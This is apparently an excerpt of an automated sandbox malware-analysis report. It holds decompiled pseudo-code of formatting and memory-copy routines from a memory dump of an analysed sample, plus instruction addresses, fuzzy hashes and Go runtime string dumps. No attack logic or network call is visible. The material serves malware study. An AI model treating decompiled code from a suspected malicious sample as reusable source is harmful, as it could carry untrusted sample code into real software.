                                                                                                                            				 *(_t405 + 0x30) = _t138;
                                                                                                                            				if (_t138 != 0) goto 0xf8a748c5;
                                                                                                                            				_t139 = E0000025B25BF8A797B0(_t10, _t229, 0, _t237,  *((intOrPtr*)(__rdx + 0x28)),  *((intOrPtr*)(_t402 + 0x390)), r9d);
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				_t242 = _t139 - 1;
                                                                                                                            				if (_t242 != 0) goto 0xf8a74849;
                                                                                                                            				E0000025B25BF8A797B0(_t10, _t229, r13d, _t237,  *((intOrPtr*)(__rdx + 0x28)),  *((intOrPtr*)(_t402 + 0x3a0)),  *(_t402 + 0x3a8));
                                                                                                                            				_t232 =  *(_t402 + 0x3a8);
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(_t10, 0, _t229, _t237, _t405 + 0x50,  *((intOrPtr*)(_t402 + 0x3a0)),  *(_t402 + 0x3a8));
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A73314(_t12, _t10, _t242, _t301, _t405 + 0x38, _t405 + 0x50, __rdx, __rsi, _t402,  *(_t402 + 0x3a8), _t434, _t459, _t455);
                                                                                                                            				 *(_t405 + 0x28) = _t395[0xa];
                                                                                                                            				 *(_t405 + 0x20) = _t405 + 0x50;
                                                                                                                            				E0000025B25BF8A794CC(_t12, _t10, _t405 + 0x50, _t395[0xc], _t405 + 0x50, 0xf8a8bc60,  *_t395, _t452);
                                                                                                                            				if (_t242 != 0) goto 0xf8a74f7d;
                                                                                                                            				r8d = 0x80;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t242 != 0) goto 0xf8a74961;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(_t190, 0, _t229, _t237, _t405 + 0x50, _t395[0xc] + 0xf8a8bc60, 0xf8a8bc60);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A73314(_t12, _t190, _t242, _t301, _t405 + 0x38, _t405 + 0x50, _t395, _t397, _t402, 0xf8a8bc60,  *_t395, _t450, _t401);
                                                                                                                            				_t265 = _t395[0xa];
                                                                                                                            				_t243 =  *(_t395[2]);
                                                                                                                            				if (_t243 != 0) goto 0xf8a74a05;
                                                                                                                            				 *(_t405 + 0x20) = _t265;
                                                                                                                            				E0000025B25BF8A794CC(_t12, _t190, _t265, _t395[0xc], _t405 + 0x50, 0xf8a8bc44, _t405 + 0x50);
                                                                                                                            				goto 0xf8a74a20;
                                                                                                                            				 *(_t405 + 0x28) = _t265;
                                                                                                                            				 *(_t405 + 0x20) = _t405 + 0x50;
                                                                                                                            				E0000025B25BF8A794CC(_t12, _t190, _t405 + 0x50, _t395[0xc], _t405 + 0x50, 0xf8a8bc50, _t405 + 0x50);
                                                                                                                            				if (_t243 != 0) goto 0xf8a74f7d;
                                                                                                                            				r8d = 0x80;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t243 != 0) goto 0xf8a74a40;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				E0000025B25BF8A797B0(_t190, _t229, _t232, _t237, _t395[6], _t395[0xa], _t232);
                                                                                                                            				_t395[8] = _t232;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				_t151 = _t395[9];
                                                                                                                            				 *(_t405 + 0x30) = _t151;
                                                                                                                            				0xf8a60658();
                                                                                                                            				if (_t151 != 0) goto 0xf8a7503b;
                                                                                                                            				_t233 =  *(_t405 + 0x30);
                                                                                                                            				E0000025B25BF8A793C0(_t190, 0, _t229, _t237, _t395[0xa], _t395[0xa], _t395[9]);
                                                                                                                            				goto 0xf8a74b61;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(_t190, 0, _t229, _t237, _t405 + 0x50, _t395[0xa],  *(_t405 + 0x30));
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A797B0(_t190, _t229, _t233, _t237, _t395[0xc], _t405 + 0x50, E0000025B25BF8A73314(_t188, _t190, _t151, _t301, _t405 + 0x38, _t405 + 0x50, _t395, _t397, _t402,  *(_t405 + 0x30), _t405 + 0x30));
                                                                                                                            				if ( *((char*)(_t405 + 0x50 + _t456 + 1)) != 0) goto 0xf8a74b26;
                                                                                                                            				_t156 = E0000025B25BF8A797B0(_t190, _t229, _t233, _t237, _t456 + 1 + _t395[0xc], _t395[0xa], _t233);
                                                                                                                            				if ( *((char*)(_t405 + 0x50 + _t456 + 1)) != 0) goto 0xf8a74b44;
                                                                                                                            				_t234 = _t233 + _t156;
                                                                                                                            				E0000025B25BF8A793C0(_t190, 0, _t229, _t237, _t395[0xa], _t395[0xa], _t395[9]);
                                                                                                                            				goto 0xf8a74f83;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(_t190, 0, _t229, _t237, _t405 + 0x50, _t395[0xc], _t234);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				_t160 = E0000025B25BF8A797B0(_t190, _t229, _t234, _t237, _t234 + _t395[0xa], _t405 + 0x50, E0000025B25BF8A73314(_t188, _t190,  *((char*)(_t405 + 0x50 + _t456 + 1)), _t301, _t405 + 0x38, _t405 + 0x50, _t395, _t397, _t402, _t234, _t405 + 0x30));
                                                                                                                            				_t247 =  *((char*)(_t405 + 0x50 + _t456 + 1));
                                                                                                                            				if (_t247 != 0) goto 0xf8a74bb1;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				r8d = _t234 + _t160;
                                                                                                                            				 *(_t405 + 0x20) = _t395[9];
                                                                                                                            				_t162 = E0000025B25BF8A6EADC(0x61, _t301, _t395[0xa], _t395, _t397, _t402, _t395[0xc], _t448);
                                                                                                                            				goto 0xf8a74d4c;
                                                                                                                            				if (_t247 == 0) goto 0xf8a74eb0;
                                                                                                                            				if (_t247 == 0) goto 0xf8a74dfa;
                                                                                                                            				if (_t247 == 0) goto 0xf8a74df3;
                                                                                                                            				if (_t247 == 0) goto 0xf8a74d63;
                                                                                                                            				if (_t247 == 0) goto 0xf8a74d24;
                                                                                                                            				if (_t247 == 0) goto 0xf8a74d0c;
                                                                                                                            				if (_t247 != 0) goto 0xf8a74849;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(0x61, 0xfffffffffffffff0, _t229, _t237, _t405 + 0x50, _t395[0xa], _t159);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A73314(_t188, 0x61, _t247, _t301, _t405 + 0x38, _t405 + 0x50, _t395, _t162, _t402, _t159, _t395[0xc]);
                                                                                                                            				if (_t460 == 0) goto 0xf8a74c7d;
                                                                                                                            				_t277 = _t456 + 1;
                                                                                                                            				if ( *((char*)(_t460 + _t277)) != 0) goto 0xf8a74c49;
                                                                                                                            				_t250 = _t277;
                                                                                                                            				if (_t250 == 0) goto 0xf8a74c7d;
                                                                                                                            				 *(_t405 + 0x20) = _t460;
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x61, _t277, _t395[0xc], _t405 + 0x50, 0xf8a8bc78,  *_t395);
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a74c9f;
                                                                                                                            				 *(_t405 + 0x20) = _t405 + 0x50;
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x61, _t405 + 0x50, _t395[0xc], _t405 + 0x50, 0xf8a8bc78,  *_t395);
                                                                                                                            				if (_t250 != 0) goto 0xf8a74f7d;
                                                                                                                            				r8d = 0x80;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t250 != 0) goto 0xf8a74cbe;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				r9d = _t395[9];
                                                                                                                            				E0000025B25BF8A6EBA8(0x61, _t234 + _t160, _t234 + _t160, _t301, _t395[0xa], _t395[0xc] + 0xf8a8bc78, _t395, _t162, _t402, _t395[0xc]);
                                                                                                                            				goto 0xf8a74bda;
                                                                                                                            				 *(_t405 + 0x30) = _t395[9];
                                                                                                                            				_t251 = E0000025B25BF8A6EA00(_t395[9], _t301, _t395[0xc], _t405 + 0x30);
                                                                                                                            				if (_t251 != 0) goto 0xf8a7503b;
                                                                                                                            				E0000025B25BF8A793C0(0x61, 0, _t229, _t237, _t395[0xa], _t395[0xc] + 0xf8a8bc78, _t395[9]);
                                                                                                                            				goto 0xf8a74b61;
                                                                                                                            				 *(_t405 + 0x20) = _t395[0xa];
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x61, _t395[0xa], _t395[0xc], _t395[0xc] + 0xf8a8bc78, 0xf8a8bad8, _t395[4]);
                                                                                                                            				if (_t251 != 0) goto 0xf8a74f7d;
                                                                                                                            				r8d = 0x80;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t251 != 0) goto 0xf8a74da5;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				goto 0xf8a74bc3;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(0x41, 0, _t229, _t237, _t405 + 0x50, _t395[0xc] + 0xf8a8bad8, 0xf8a8bad8);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A73314(_t188, 0x41, _t251, _t301, _t405 + 0x38, _t405 + 0x50, _t395,  *(_t405 + 0x30), _t402, 0xf8a8bad8, _t395[4]);
                                                                                                                            				 *(_t405 + 0x20) = _t405 + 0x50;
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x41, _t405 + 0x50, _t395[0xc], _t405 + 0x50, 0xf8a8bc78,  *_t395);
                                                                                                                            				if (_t251 != 0) goto 0xf8a74f7d;
                                                                                                                            				r8d = 0x80;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t251 != 0) goto 0xf8a74e62;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A793C0(0x41, 0, _t229, _t237, _t405 + 0x50, _t395[0xc] + 0xf8a8bc78, 0xf8a8bc78);
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A73314(_t188, 0x41, _t251, _t301, _t405 + 0x38, _t405 + 0x50, _t395,  *(_t405 + 0x30), _t402, 0xf8a8bc78,  *_t395);
                                                                                                                            				_t252 =  *(_t395[2]);
                                                                                                                            				if (_t252 != 0) goto 0xf8a74efd;
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x41, _t301 - 1, _t395[0xc], _t405 + 0x50, 0xf8a8bc6c, _t405 + 0x50);
                                                                                                                            				goto 0xf8a74f13;
                                                                                                                            				 *(_t405 + 0x20) = _t405 + 0x50;
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x41, _t405 + 0x50, _t395[0xc], _t405 + 0x50, 0xf8a8bc70, _t405 + 0x50);
                                                                                                                            				if (_t252 != 0) goto 0xf8a74f7d;
                                                                                                                            				r8d = 0x80;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t252 != 0) goto 0xf8a74f2f;
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				r8d = 0x400;
                                                                                                                            				E0000025B25BF8A797B0(0x41, _t229, _t234 + _t160, _t237, _t395[2] + 0xf8a8bc70, _t395[0xc] + 0xf8a8bc70, 0xf8a8bc70);
                                                                                                                            				goto 0xf8a74849;
                                                                                                                            				if (r12d != 0) goto 0xf8a7503b;
                                                                                                                            				if (_t460 == 0) goto 0xf8a7503b;
                                                                                                                            				_t457 = _t456 + 1;
                                                                                                                            				if ( *((char*)(_t460 + _t457)) != 0) goto 0xf8a74f9f;
                                                                                                                            				_t256 = _t457;
                                                                                                                            				if (_t256 == 0) goto 0xf8a7503b;
                                                                                                                            				 *(_t405 + 0x20) = _t460;
                                                                                                                            				E0000025B25BF8A794CC(_t188, 0x41, _t301 - 1, _t395[0xc], _t395[0xc] + 0xf8a8bc70, 0xf8a8bc78,  *_t395);
                                                                                                                            				if (_t256 != 0) goto 0xf8a75033;
                                                                                                                            				asm("movaps xmm0, [edx]");
                                                                                                                            				asm("movaps [ecx], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x10]");
                                                                                                                            				asm("movaps [ecx+0x10], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x20]");
                                                                                                                            				asm("movaps [ecx+0x20], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x30]");
                                                                                                                            				asm("movaps [ecx+0x30], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x40]");
                                                                                                                            				asm("movaps [ecx+0x40], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x50]");
                                                                                                                            				asm("movaps [ecx+0x50], xmm1");
                                                                                                                            				asm("movaps xmm0, [edx+0x60]");
                                                                                                                            				asm("movaps [ecx+0x60], xmm0");
                                                                                                                            				asm("movaps xmm1, [edx+0x70]");
                                                                                                                            				asm("movaps [ecx-0x10], xmm1");
                                                                                                                            				if (_t301 - 1 != 0) goto 0xf8a74fe8;
                                                                                                                            				goto 0xf8a7503b;
                                                                                                                            				return E0000025B25BF8A797B0(0x41, _t229, 0x400, _t237,  *_t395 + (_t395[0xc] |  *_t395), _t395[0xc] + (_t395[0xc] |  *_t395),  *(_t405 + 0x30));
                                                                                                                            			}

                                                                                                                            0x25bf8a74bce
                                                                                                                            0x25bf8a74bd1
                                                                                                                            0x25bf8a74bd5
                                                                                                                            0x25bf8a74bdd
                                                                                                                            0x25bf8a74be5
                                                                                                                            0x25bf8a74bed
                                                                                                                            0x25bf8a74bf5
                                                                                                                            0x25bf8a74bfd
                                                                                                                            0x25bf8a74c05
                                                                                                                            0x25bf8a74c0e
                                                                                                                            0x25bf8a74c16
                                                                                                                            0x25bf8a74c21
                                                                                                                            0x25bf8a74c27
                                                                                                                            0x25bf8a74c36
                                                                                                                            0x25bf8a74c3c
                                                                                                                            0x25bf8a74c44
                                                                                                                            0x25bf8a74c49
                                                                                                                            0x25bf8a74c51
                                                                                                                            0x25bf8a74c53
                                                                                                                            0x25bf8a74c56
                                                                                                                            0x25bf8a74c6b
                                                                                                                            0x25bf8a74c70
                                                                                                                            0x25bf8a74c75
                                                                                                                            0x25bf8a74c7b
                                                                                                                            0x25bf8a74c95
                                                                                                                            0x25bf8a74c9a
                                                                                                                            0x25bf8a74caf
                                                                                                                            0x25bf8a74cb8
                                                                                                                            0x25bf8a74cbe
                                                                                                                            0x25bf8a74cc1
                                                                                                                            0x25bf8a74cc4
                                                                                                                            0x25bf8a74cc8
                                                                                                                            0x25bf8a74ccc
                                                                                                                            0x25bf8a74cd0
                                                                                                                            0x25bf8a74cd4
                                                                                                                            0x25bf8a74cd8
                                                                                                                            0x25bf8a74cdc
                                                                                                                            0x25bf8a74ce0
                                                                                                                            0x25bf8a74ce4
                                                                                                                            0x25bf8a74ce8
                                                                                                                            0x25bf8a74cec
                                                                                                                            0x25bf8a74cf0
                                                                                                                            0x25bf8a74cf4
                                                                                                                            0x25bf8a74cfe
                                                                                                                            0x25bf8a74d05
                                                                                                                            0x25bf8a74d07
                                                                                                                            0x25bf8a74d0c
                                                                                                                            0x25bf8a74d1a
                                                                                                                            0x25bf8a74d1f
                                                                                                                            0x25bf8a74d36
                                                                                                                            0x25bf8a74d3f
                                                                                                                            0x25bf8a74d41
                                                                                                                            0x25bf8a74d56
                                                                                                                            0x25bf8a74d5e
                                                                                                                            0x25bf8a74d7b
                                                                                                                            0x25bf8a74d80
                                                                                                                            0x25bf8a74d96
                                                                                                                            0x25bf8a74d9f
                                                                                                                            0x25bf8a74da5
                                                                                                                            0x25bf8a74da8
                                                                                                                            0x25bf8a74dab
                                                                                                                            0x25bf8a74daf
                                                                                                                            0x25bf8a74db3
                                                                                                                            0x25bf8a74db7
                                                                                                                            0x25bf8a74dbb
                                                                                                                            0x25bf8a74dbf
                                                                                                                            0x25bf8a74dc3
                                                                                                                            0x25bf8a74dc7
                                                                                                                            0x25bf8a74dcb
                                                                                                                            0x25bf8a74dcf
                                                                                                                            0x25bf8a74dd3
                                                                                                                            0x25bf8a74dd7
                                                                                                                            0x25bf8a74ddb
                                                                                                                            0x25bf8a74de5
                                                                                                                            0x25bf8a74dec
                                                                                                                            0x25bf8a74dee
                                                                                                                            0x25bf8a74df5
                                                                                                                            0x25bf8a74e01
                                                                                                                            0x25bf8a74e07
                                                                                                                            0x25bf8a74e16
                                                                                                                            0x25bf8a74e1c
                                                                                                                            0x25bf8a74e39
                                                                                                                            0x25bf8a74e3e
                                                                                                                            0x25bf8a74e53
                                                                                                                            0x25bf8a74e5c
                                                                                                                            0x25bf8a74e62
                                                                                                                            0x25bf8a74e65
                                                                                                                            0x25bf8a74e68
                                                                                                                            0x25bf8a74e6c
                                                                                                                            0x25bf8a74e70
                                                                                                                            0x25bf8a74e74
                                                                                                                            0x25bf8a74e78
                                                                                                                            0x25bf8a74e7c
                                                                                                                            0x25bf8a74e80
                                                                                                                            0x25bf8a74e84
                                                                                                                            0x25bf8a74e88
                                                                                                                            0x25bf8a74e8c
                                                                                                                            0x25bf8a74e90
                                                                                                                            0x25bf8a74e94
                                                                                                                            0x25bf8a74e98
                                                                                                                            0x25bf8a74ea2
                                                                                                                            0x25bf8a74ea9
                                                                                                                            0x25bf8a74eab
                                                                                                                            0x25bf8a74eb7
                                                                                                                            0x25bf8a74ebd
                                                                                                                            0x25bf8a74ecc
                                                                                                                            0x25bf8a74ed2
                                                                                                                            0x25bf8a74edf
                                                                                                                            0x25bf8a74ee8
                                                                                                                            0x25bf8a74ef6
                                                                                                                            0x25bf8a74efb
                                                                                                                            0x25bf8a74f09
                                                                                                                            0x25bf8a74f0e
                                                                                                                            0x25bf8a74f24
                                                                                                                            0x25bf8a74f29
                                                                                                                            0x25bf8a74f2f
                                                                                                                            0x25bf8a74f32
                                                                                                                            0x25bf8a74f35
                                                                                                                            0x25bf8a74f39
                                                                                                                            0x25bf8a74f3d
                                                                                                                            0x25bf8a74f41
                                                                                                                            0x25bf8a74f45
                                                                                                                            0x25bf8a74f49
                                                                                                                            0x25bf8a74f4d
                                                                                                                            0x25bf8a74f51
                                                                                                                            0x25bf8a74f55
                                                                                                                            0x25bf8a74f59
                                                                                                                            0x25bf8a74f5d
                                                                                                                            0x25bf8a74f61
                                                                                                                            0x25bf8a74f65
                                                                                                                            0x25bf8a74f6f
                                                                                                                            0x25bf8a74f76
                                                                                                                            0x25bf8a74f78
                                                                                                                            0x25bf8a74f7d
                                                                                                                            0x25bf8a74f83
                                                                                                                            0x25bf8a74f88
                                                                                                                            0x25bf8a74f90
                                                                                                                            0x25bf8a74f99
                                                                                                                            0x25bf8a74f9f
                                                                                                                            0x25bf8a74fa7
                                                                                                                            0x25bf8a74fa9
                                                                                                                            0x25bf8a74fac
                                                                                                                            0x25bf8a74fc7
                                                                                                                            0x25bf8a74fcc
                                                                                                                            0x25bf8a74fe1
                                                                                                                            0x25bf8a74fe8
                                                                                                                            0x25bf8a74feb
                                                                                                                            0x25bf8a74fee
                                                                                                                            0x25bf8a74ff2
                                                                                                                            0x25bf8a74ff6
                                                                                                                            0x25bf8a74ffa
                                                                                                                            0x25bf8a74ffe
                                                                                                                            0x25bf8a75002
                                                                                                                            0x25bf8a75006
                                                                                                                            0x25bf8a7500a
                                                                                                                            0x25bf8a7500e
                                                                                                                            0x25bf8a75012
                                                                                                                            0x25bf8a75016
                                                                                                                            0x25bf8a7501a
                                                                                                                            0x25bf8a7501e
                                                                                                                            0x25bf8a75028
                                                                                                                            0x25bf8a7502f
                                                                                                                            0x25bf8a75031
                                                                                                                            0x25bf8a7505b

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3442832105-0
                                                                                                                            • Opcode ID: f224ef4bc0b99063b16ba8605824afb64d911b0e385d29212052daac2cccefab
                                                                                                                            • Instruction ID: 02a461fad148845da8b1ad2d108c308a9e9b81469b25c5370cb476dfbd3eccfe
                                                                                                                            • Opcode Fuzzy Hash: f224ef4bc0b99063b16ba8605824afb64d911b0e385d29212052daac2cccefab
                                                                                                                            • Instruction Fuzzy Hash: AF42C663614E8592FE268B29D8093EDA3B0FF95766F145101FF8917E61EF38C2A2D314
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            • B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_DigitInherite, xrefs: 0131BA4F
                                                                                                                            • B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSC, xrefs: 0131BACF
                                                                                                                            • exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLib, xrefs: 0131B9A5
                                                                                                                            • )+,-./0:<=?CLMPSZ[\, xrefs: 0131BB33
                                                                                                                            • pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGuj, xrefs: 0131B956
                                                                                                                            • B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte , xrefs: 0131BAEF
                                                                                                                            • [controller reset]bad lfnode addressbad manualFreeListconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperatio, xrefs: 0131BB58
                                                                                                                            • B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = : status=Bassa_VahBhaiksukiCuneiformDiacriticFindCloseHex_Digi, xrefs: 0131BA6F
                                                                                                                            • % CPU (, goid=, j0 = AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWKOWAODWSARecvWSASend, xrefs: 0131B985
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-3153016845
                                                                                                                            • Opcode ID: dd6c5e7e0275eb5c8c73b765a777e0c63043d271df2078dd82b5f1dc49e1ad4c
                                                                                                                            • Instruction ID: 6997ab67459cada58c591e175b71a78dee5478a6a3488b1d098a65712f5318a8
                                                                                                                            • Opcode Fuzzy Hash: dd6c5e7e0275eb5c8c73b765a777e0c63043d271df2078dd82b5f1dc49e1ad4c
                                                                                                                            • Instruction Fuzzy Hash: 8EA1A631614F8585DA06EF29E48039BBB65FBE9B84F448222DE4E17B39DF38C580C714
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
